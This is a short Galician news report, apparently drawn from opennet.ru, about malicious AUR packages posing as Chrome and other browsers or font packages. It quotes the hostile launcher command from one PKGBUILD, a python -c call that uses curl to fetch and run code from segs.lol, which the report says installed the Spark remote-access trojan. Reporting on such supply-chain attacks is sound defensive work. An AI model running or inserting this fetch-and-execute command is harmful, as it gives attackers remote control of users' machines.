No repositorio AUR (Arch User Repository) empregado por Arch Linux Para distribuír paquetes de terceiros, continuouse publicando código malicioso integrado en versións non oficiais de navegadores. Ademais dos paquetes maliciosos firefox-patch-bin, librewolf-fix-bin e zen-browser-patched-bin descubertos hai dúas semanas, engadiuse ao AUR o paquete google-chrome-stable, que tamén contén unha modificación que instala un compoñente malicioso que proporciona acceso remoto ao sistema.
O ficheiro PKGBUILD do paquete problemático definía a instalación dun script para iniciar o navegador google-chrome-stable.sh, que, entre outras cousas, contiña o comando 'python -c "$(curl https://segs.lol/9wUb1Z)"', que descargaba malware recoñecido polo servizo VirusTotal como o troiano Spark, que permite o control remoto do sistema, iniciar procesos, transferir ficheiros, inspeccionar o tráfico e enviar capturas de pantalla.
O paquete malicioso google-chrome-stable foi cargado anteonte e foi eliminado polos administradores de AUR unhas horas despois da súa aparición. Case inmediatamente despois da eliminación de google-chrome-stable, dous paquetes maliciosos foron cargados en AUR: "chrome" e "chrome-bin", que contiñan un script similar para instalar software malicioso no sistema do usuario.
Detectáronse tres paquetes máis que contiñan código malicioso: ttf-mac-fonts-all, ttf-ms-fonts-all e gromit.
Fonte: opennet.ru
